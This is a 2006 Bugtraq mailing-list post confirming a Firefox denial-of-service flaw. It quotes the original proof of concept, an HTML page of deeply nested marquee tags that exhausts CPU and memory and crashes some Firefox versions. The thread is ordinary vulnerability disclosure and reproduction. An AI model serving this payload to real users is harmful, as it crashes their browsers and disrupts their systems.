Bugtraq mailing list archives
Re: Fire fox dos exploit
From: Phil Trainor <ptrainor () imperfectnetworks com>
Date: Wed, 31 May 2006 13:14:41 -0700
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 I was able to use this proof of concept code with the following results: With Firefox 1.0.8 (Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.13) Gecko/20060418 Fedora/1.0.8-1.1.fc4 Firefox/1.0.8) I was able to cause a resource exhaustion with firefox increasing cpu cycles and memory allocation well beyond normal utilization but without crashing. With Firefox 1.5.0.3 (Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.3) Gecko/20060426 Firefox/1.5.0.3) Firefox causes resource exhaustion to the point of crashing the application. Josh Zlatin-Amishav wrote:
On Tue, 30 May 2006, co296 () aol com wrote:I have found a problem which causes denial of service on fire fox browserCan you give us some more details, like versions and platforms affected? I was unable to recreate this flaw using firefox 1.5.dfsg+1.5.0 on Debian unstable. -- - JoshCreadit:to n00b for finding this bug.. the problem lie's in the <marquee> html tag uses 100% cpu and crash's the browser.. Following proof of concept available <html> <head> <title>Credit to n00b..</title> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> </head> <body> <marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></mar
q
uee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee> </body> </html>
-----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.2.1 (GNU/Linux) Comment: Using GnuPG with Fedora - http://enigmail.mozdev.org iD8DBQFEffkxosz5/4IhOt4RAnmyAJ9a/TtfSGFlPW+wT/r6RyS3E57M3gCeIC4X /FsKrmn9RqJrINi0Z5PwvZA= =Wso3 -----END PGP SIGNATURE-----
Current thread:
- Re: Fire fox dos exploit pagvac (Jun 04)
- <Possible follow-ups>
- RE: Fire fox dos exploit Andy (Jun 04)
- RE: Fire fox dos exploit Sanjay Rawat (Jun 05)
- RE: Fire fox dos exploit Jaroslaw Sajko (Jun 07)
- RE: Fire fox dos exploit Sanjay Rawat (Jun 05)
- Re: Fire fox dos exploit Ronald van den Blink (Jun 04)
- Re: Fire fox dos exploit Yannick von Arx (Jun 04)
- Re: Re: Fire fox dos exploit vincenzo . ampolo (Jun 04)
- Re: Fire fox dos exploit Phil Trainor (Jun 04)
- Re: Fire fox dos exploit Ronald van den Blink (Jun 04)
- Re: Fire fox dos exploit Aaron Hopkins (Jun 04)
- Re: Re: Fire fox dos exploit al4321 (Jun 07)